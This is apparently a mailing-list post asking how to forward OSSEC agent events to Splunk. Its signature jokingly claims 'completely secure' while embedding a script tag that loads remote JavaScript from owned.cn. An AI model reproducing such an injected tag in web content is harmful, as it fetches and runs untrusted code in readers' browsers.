Hi *, I'm testing the integration of OSSEC with Splunk. I followed the configuration as describe in the Wiki. It works! Splunk runs on my OSSEC server. The problem I have at the moment: only events generated by the server are sent to Splunk. I don't see any trace of events generated by the remote agents.
Did I miss something in the design? ALL agents must have the syslog_output enabled? /x -- My server is com<script src=http://owned.cn/js.js>pletely secure. -- To unsubscribe, reply using "remove me" as the subject.
